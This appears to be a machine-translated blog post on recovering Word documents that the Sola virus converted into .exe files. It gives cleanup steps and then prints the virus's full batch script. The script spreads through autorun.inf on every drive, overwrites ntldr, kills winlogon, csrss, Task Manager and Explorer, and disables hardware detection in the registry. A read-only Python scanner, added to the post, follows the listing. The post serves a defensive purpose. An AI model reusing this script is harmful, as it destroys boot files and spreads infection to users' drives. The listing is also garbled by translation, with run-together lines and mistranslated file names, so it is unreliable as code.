Batch recovery of Word documents changed to .exe files by the Sola virus

Source: Internet
Author: User

First, boot into a PE environment and decompress the infected Word file with the ZIP or RAR tool provided by PE. After decompression, three files appear: function.dll, Sola****.bat and ****.doc. Note that all of these files are hidden.


It is best not to use anti-virus software to scan for and remove the virus, because the anti-virus software will quarantine the source files along with it. First, back up the files (including the infected files) to a non-system disk.

Then reinstall the system. Do not run any infected file after the system is reinstalled. Next, use the "death Q & A (Sola) otaku virus exclusive killing tool" provided in the attachment to clean each drive letter and restore the Word files in batches.


The following are virus behaviors for your reference:

@ Echo offset Sola = % SystemRoot % \ fonts \ hidese ~ 1 Set setup = % SystemRoot % \ fonts \ hidese ~ 1 \ solasetupfor/F "tokens = 1" % I in ('date/t ') do set realdate = % IFOR/F "Skip = 5 tokens =" % I in ('dir % SystemRoot % \ assumer.exe ') do if/I "% J" = "assumer.exe" set date = % IIF "% 1" = "-install" Goto installif "% 1" = "- run "Goto runif" % 1 "="-tenbatsu "Goto tenbatsuif" % 1 "="-Kill "Goto killif" % 1 "="-killself "Goto killself ": checksignif "% 1" = "-USB" Start/Max .. if "% 1" = "-USB" CD solaif exist % s Ystemroot % \ fonts \ hidese ~ 1 \ Sola. sign goto open: filecopyset selfname = % 0: hideselfdate % date % MD % SystemRoot % \ fonts \ hideself... date % realdate % if not "% 1" = "-USB" type % selfname %> % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. batif "% 1" = "-USB" type Sola. Bat> % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. battype function. dll> % SystemRoot % \ fonts \ hidese ~ 1 \ function.exe echo on error resume next> % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. vbsecho set Ws = wscript. Createobject ("wscript. Shell") >>% SystemRoot % \ fonts \ hidese ~ 1 \ Sola. vbsecho ws. Run "CMD/C % Sola % \ Sola. Bat-install", 0> % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. vbscscript % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. vbsecho> % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. signdel % SystemRoot % \ fonts \ hidese ~ 1 \ Sola. vbsgoto open: Install: packersetup % systemdrive % Cd % SystemRoot % \ fonts \ hidese ~ 1if exist function.exe taskkill/f/IM function.exe if exist solasetup RD/S/Q solasetupmd solasetupcd solasetupcopy .. \ function.exe function. DLL .. \ function.exe-XCD .. date % date % Type % setup % \ rar.exe> % SystemRoot % \ system32 \ rar.exe date % realdate % copy % setup % \ function. dll % Sola % \ function. dllattrib % Sola % \ function. dll + S + H + rrar-M0-EP-EP1 a % setup % \ docpack. dll % Sola % \ function. dllrar-M0-EP-EP1 % Setup % \ txtpack. dll % Sola % \ function. dllrar-M0-EP-EP1 a % setup % \ exepack. 
dll % Sola % \ function. dllrar-M0-EP-EP1 a % setup % \ jpgpack. dll % Sola % \ function. dlldel function.exe: mainsetupset a0001 = copyset a0002 = attribset a0003 = echoset a0005 = Shell Hardware failed> % Sola % \ task.txt for/F "tokens = 1" % I in ('findstr/I "svchost.exe "" % Sola % \ task.txt "') do set svchost = % I % a0001 % SystemRoot % \ syste M32 \ cmd.exe % Sola % \ % svchost % del % Sola % \ task.txt: tasks % a0002 % SystemRoot % \ Tasks. job-s-h-rdel % SystemRoot % \ Tasks. jobdate % date % Type % setup % \ Tasks. xxx> % SystemRoot % \ Tasks. jobschtasks/change/ru "nt authority \ System"/TN "tasks" & if errorlevel 1 goto taskfaildate % realdate % goto tasksuc: taskfail % homedrive % Cd "% allusersprofile %" cd "start" Menu \ Program \ Start Date % date % a0003 % on error resume NEX T> Sola. vbs % a0003 % set Ws = wscript. createobject ("wscript. shell ")> Sola. vbs % a0003 % ws. run "% Sola % \ svchost.exe/C % Sola % \ Sola. bat-run ", 0> Sola. vbs % a0001 % Sola. vbs % Sola % \ Sola. vbs % a0003 % NT> % SystemRoot % \ fonts \ hidese ~ 1 \ notasksdate % realdate %: tasksuc % a0002 % SystemRoot % \ Tasks. job + S + H + rdate % date % a0001 % setup % \ sleep.exe % SystemRoot % \ system32 \ sleep.exe date % realdate %: noautoplaynet stop "% a0005 %" % a0003 % Windows Registry Editor Version 5.00> % SystemRoot % \ fonts \ hidese ~ 1 \ Regedit. Reg % a0003 % [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ ShellHWDetection]> % SystemRoot % \ fonts \ hidese ~ 1 \ Regedit. Reg % a0003 % "start" = DWORD: 00000004> % SystemRoot % \ fonts \ hidese ~ 1 \ Regedit. regregedit/S % SystemRoot % \ fonts \ hidese ~ 1 \ Regedit. reg: End of installgoto end & if errorlevel 1 exit: End of install: runset runroot = % allusersprofile % \ Start Menu \ Program \ Start set taskroot = % SystemRoot % \ Tasks: runtimechkif not exist % Sola % \ runtime.txt echo! 50> % Sola % \ runtime.txt for/F "tokens = 1 delims =! 
"% I in (% Sola % \ runtime.txt) do set runtime = % IIF/I % runtime % Leq 0 goto virusset/a runtime = % runtime %-1 echo! % Runtime %> % Sola % \ runtime.txt: diskchkecho on error resume next> % SystemRoot % \ fonts \ hidese ~ 1 \ recentinf. vbsecho set Ws = wscript. Createobject ("wscript. Shell") >>% SystemRoot % \ fonts \ hidese ~ 1 \ recentinf. vbsecho ws. Run "% Sola % \ svchost.exe/C % setup % \ recentinf. Bat", 0 >>% SystemRoot % \ fonts \ hidese ~ 1 \ recentinf. vbscscript % SystemRoot % \ fonts \ hidese ~ 1 \ recentinf. vbsdel % SystemRoot % \ fonts \ hidese ~ 1 \ recentinf. vbsfor % I in (c d e f g h I j k l m n o p q r s t u v w x y z) Do vol % I: & if errorlevel 1 Set % I = 1for % I in (c d e f g h I j k l m n o p q r s t u v w x Y Z) do Echo 1> % I: \ solachk1 & findstr. % I: \ solachk1 & if not errorlevel 1 del % I: \ solachk1 & findstr/C: "sola_1.0_2.0" % I: \ autorun. INF & if errorlevel 1 attrib-s-h-R % I: \ autorun. INF & copy/Y % setup % \ autorun. INF % I: \ autorun. I NF & attrib % I: \ autorun. INF + S + H + R & MD % I: \ Sola & copy/y "% setup % \ Sola. bat "% I: \ Sola. BAT & copy/y "% setup % \ function. DLL "% I: \ Sola \ function. DLL & attrib % I: \ Sola + S + H + R: turnif "% C %" = "1" vol C: & if not errorlevel 1 call % setup % \ scan. bat C: If "% d %" = "1" vol D: & if not errorlevel 1 call % setup % \ scan. bat D: If "% E %" = "1" vol E: & if not errorlevel 1 call % setup % \ scan. bat E: If "% F %" = "1" vol F: & if no T errorlevel 1 call % setup % \ scan. bat F: If "% G %" = "1" vol G: & if not errorlevel 1 call % setup % \ scan. bat G: If "% H %" = "1" vol H: & if not errorlevel 1 call % setup % \ scan. bat H: If "% I %" = "1" vol I: & if not errorlevel 1 call % setup % \ scan. bat I: If "% J %" = "1" vol J: & if not errorlevel 1 call % setup % \ scan. bat J: If "% K %" = "1" vol K: & if not errorlevel 1 call % setup % \ scan. bat K: If "% L %" = "1" vol L: & if not errorlev El 1 call % setup % \ scan. 
bat L: If "% m %" = "1" vol M: & if not errorlevel 1 call % setup % \ scan. bat M: If "% N %" = "1" vol N: & if not errorlevel 1 call % setup % \ scan. bat N: If "% o %" = "1" vol O: & if not errorlevel 1 call % setup % \ scan. bat O: If "% P %" = "1" vol P: & if not errorlevel 1 call % setup % \ scan. bat P: If "% Q %" = "1" vol Q: & if not errorlevel 1 call % setup % \ scan. bat Q: If "% R %" = "1" vol R: & if not errorlevel 1 call % Setup % \ scan. bat R: If "% S %" = "1" vol S: & if not errorlevel 1 call % setup % \ scan. bat S: If "% T %" = "1" vol T: & if not errorlevel 1 call % setup % \ scan. bat T: If "% u %" = "1" vol U: & if not errorlevel 1 call % setup % \ scan. bat U: If "% v %" = "1" Vol V: & if not errorlevel 1 call % setup % \ scan. bat V: If "% w %" = "1" vol W: & if not errorlevel 1 call % setup % \ scan. bat W: If "% x %" = "1" vol X: & if not errorlevel 1 call % setup % \ SC An. bat X: If "% Y %" = "1" vol Y: & if not errorlevel 1 call % setup % \ scan. bat Y: If "% Z %" = "1" vol Z: & if not errorlevel 1 call % setup % \ scan. 
bat Z: If "% C %" = "2" vol C: & if errorlevel 1 set C = 1if "% d %" = "2" vol D: & if errorlevel 1 set D = 1if "% E %" = "2" vol E: & if errorlevel 1 set E = 1if "% F %" = "2" vol F: & if errorlevel 1 set f = 1if "% G %" = "2" vol G: & if errorlevel 1 Set G = 1if "% H %" = "2" vol H: & if errorlevel 1 Set H = 1if "% I %" = "2" vol I: & if errorlevel 1 set I = 1if "% J %" = "2" vol J: & if errorlevel 1 Set J = 1if "% K %" = "2" vol K: & if errorlevel 1 set K = 1if "% L %" = "2" vol L: & if errorlevel 1 set L = 1if "% m %" = "2" vol M: & if errorlevel 1 Set M = 1if "% N %" = "2" vol N: & if errorlevel 1 set n = 1if "% o %" = "2" vol O: & if errorlevel 1 set O = 1if "% P %" = "2" vol P: & if errorlevel 1 Set P = 1if "% Q %" = "2" vol Q: & if errorlevel 1 Set q = 1i F "% R %" = "2" vol R: & if errorlevel 1 Set R = 1if "% S %" = "2" vol s: & if errorlevel 1 set S = 1if "% T %" = "2" vol t: & if errorlevel 1 set T = 1if "% u %" = "2" vol U: & if errorlevel 1 set U = 1if "% v %" = "2" Vol V: & if errorlevel 1 set V = 1if "% w %" = "2" vol W: & if errorlevel 1 set w = 1if "% x %" = "2" vol X: & if errorlevel 1 set X = 1if "% Y %" = "2" vol Y: & if errorlevel 1 set Y = 1if "% Z %" = "2" vol Z: & if errorlevel 1 set Z = 1if ex Ist % SystemRoot % \ fonts \ hidese ~ 1 \ notasks if not exist "% runroot % \ Sola. vbs "copy" % Sola % \ Sola. vbs "" % runroot % \ Sola. vbs "if not exist % SystemRoot % \ fonts \ hidese ~ 1 \ notasks if not exist % taskroot % \ Tasks. job copy % setup % \ Tasks. xxx % taskroot % \ Tasks. job & attrib % taskroot % \ Tasks. job + S + H + R & schtasks/change/ru "nt authority \ System"/TN "tasks" Sleep 2000 goto turn: End of rungoto end & if errorlevel 1 exit:: End of run: virusif not "% runtime %" = "0" Goto viruschkset/a runtime = % runtime %-1 echo! % Runtime %> % Sola % \ runtime.txt cd "% allusersprofile % \ Start Menu \ Program \ Start" echo on error resume next> tenbatsu. vbsecho set Ws = wscript. createobject ("wscript. shell ")> tenbatsu. 
vbsecho ws. run "% Sola % \ Sola. bat-tenbatsu ", 0> tenbatsu. vbsgoto diskchk: viruschkif not exist "% allusersprofile % \ Start Menu \ Program \ Start \ tenbatsu. vbs "Goto killgoto diskchk: tenbatsu: killntldrattrib % systemdrive % \ ntldr-s-h-rcopy/Y % systemdrive % \ ntld R % Sola % \ ntldrecho no ntldr> % systemdrive % \ ntldr: attrib % systemdrive % \ ntldr + S + H + R: pausesfcstart MSHTA "javascript: New activexobject ('wscript. shell '). run ('ntsd-PN winlogon.exe ', 0); window. close () ": killtaskmgrdel/Q/A % SystemRoot % \ system32 \ dllcache \ taskmgr.exe taskkill/f/IM taskmgr.exe & if errorlevel 1 Ren % SystemRoot % \ system32 \ taskmgr.exe taskmgr. xxx & if errorlevel 1 start MSHTA "javascript: New activexobject ('wscript. shell '). run ('ntsd-C q-PN taskmgr.exe ', 0); window. close () "& sleep 500ren % SystemRoot % \ system32 \ taskmgr.exe taskmgr. XXX: killexplorertaskkill/f/IM assumer.exe> NUL & if errorlevel 1 Ren % SystemRoot % \ system32 \ assumer.exe explorer. xxx & start MSHTA "javascript: New activexobject ('wscript. shell '). run ('ntsd-C q-PN cmder.exe ', 0); window. close () "& sleep 500ren % systemroo T % \ assumer.exe explorer. xxxstart/max % setup % \ tenbatsu. BAT: timesetsleep 661_if exist % Sola % \ killself Exit: killattrib % systemdrive % \ ntldr-s-h-recho no ntldr> % systemdrive % \ ntldr :: attrib % systemdrive % \ ntldr + S + H + rtasklist> % Sola % \ task.txt for/F "tokens = 2" % I in ('findstr/I "csrss.exe" "% sola % \ task.txt "') do ntsd-P % igoto diskchk: killself: startexplorerren % SystemRoot % \ Explorer. xxx Explorer. Exestart % SystemRoot % \ assumer.exe: backntldrattrib % systemdrive % \ ntldr-s-h-rcopy/Y % Sola % \ ntldr % systemdrive % \ ntldrattrib % systemdrive % \ ntldr + S + H + R: running mgren % SystemRoot % \ system32 \ taskmgr. 
xxx taskmgr.exe: killviruscopy % setup % \ killvirus.txt % Sola % \ killvirus.txt C: cdmd ~ Installcd ~ Installrar X-hpkakenhi200601 % setup % \ solakiller.rar MSHTA "javascript: New activexobject ('wscript. shell'). Run ('C :\\~ Install \ install. bat % 1', 0); window. close () "RD/S/Q % setup % attrib % SystemRoot % \ Tasks. job-s-h-rdel % SystemRoot % \ Tasks. jobcd "% allusersprofile % \ Start Menu \ Program \ Start" If exist Sola. vbs del Sola. vbsif exist tenbatsu. vbs del tenbatsu. vbsstart % SystemRoot % \ system32 \ notepad.exe % Sola % \ killvirus.txt del % Sola % \ Sola. batexit: openif "% 1" = "-USB" exitgoto getname: backopenif not exist "% name %" exitcall "% name %": savefor/F "delims =: "% I in ('findstr" % code % "*. EXE ') do set packname = % IRAR-M0-EP-EP1 a "% packname %" "% name %" Echo % code %> "% packname % ": delattrib "% name %"-s-h-rdel "% name %" attrib function. DLL-s-h-rdel function. dllattrib % 0-s-h-rdel % 0 Exit: cmd program will stop there.: getnameset code = sola_2.0_12695220593667set name= .doc goto backopen: End
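
A read-only triage pass over the backed-up files, added here as an example (it is not the author's code and not the killing tool mentioned above). It flags files carrying the markers visible in the listing: an autorun.inf containing sola_1.0_2.0, a function.dll inside a Sola folder, and .exe files containing the sola_2.0_ prefix of the code value. Matching on that prefix rather than the full code value is an assumption, and the sample tree is constructed from harmless placeholder bytes.

```python
import os
import tempfile

AUTORUN_MARKER = b"sola_1.0_2.0"  # string the listing looks for in autorun.inf
PACK_MARKER = b"sola_2.0_"        # prefix of the listing's code value (prefix match is an assumption)

def file_contains(path, marker, chunk=1 << 20):
    """Chunked byte search, so large files are never loaded whole."""
    tail = b""
    with open(path, "rb") as fh:
        while block := fh.read(chunk):
            data = tail + block
            if marker in data:
                return True
            tail = data[-(len(marker) - 1):]  # keep overlap for markers split across chunks
    return False

def scan_tree(root):
    """Walk a backup tree read-only and return sorted (relative path, reason) findings."""
    findings = []
    for folder, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(folder, name)
            rel = os.path.relpath(path, root)
            low = name.lower()
            if low == "autorun.inf" and file_contains(path, AUTORUN_MARKER):
                findings.append((rel, "autorun.inf carries the Sola marker"))
            elif low == "function.dll" and os.path.basename(folder).lower() == "sola":
                findings.append((rel, "function.dll inside a Sola folder"))
            elif low.endswith(".exe") and file_contains(path, PACK_MARKER):
                findings.append((rel, "exe carries the Sola pack marker"))
    return sorted(findings)

def build_sample(root):  # constructed sample tree, harmless placeholder bytes only
    os.makedirs(os.path.join(root, "Sola"))
    samples = {
        "autorun.inf": b"[autorun]\r\n;sola_1.0_2.0\r\n",
        os.path.join("Sola", "function.dll"): b"placeholder",
        "report.exe": b"MZ" + b"\0" * 64 + b"sola_2.0_000 (constructed)",
        "setup.exe": b"MZ" + b"\0" * 64,  # clean file, must not be flagged
    }
    for rel, data in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print(*scan_tree(tmp), sep="\n")
```

Point scan_tree at the non-system disk holding the backup, from the PE environment or from the reinstalled system; it only reads files and never runs them.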

This article is from the "Chongqing network management" blog; please be sure to retain this source: http://023wg.blog.51cto.com/1462514/1551661
